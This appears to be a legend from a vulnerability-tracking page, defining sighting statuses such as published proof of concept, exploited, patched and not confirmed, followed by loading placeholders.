- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…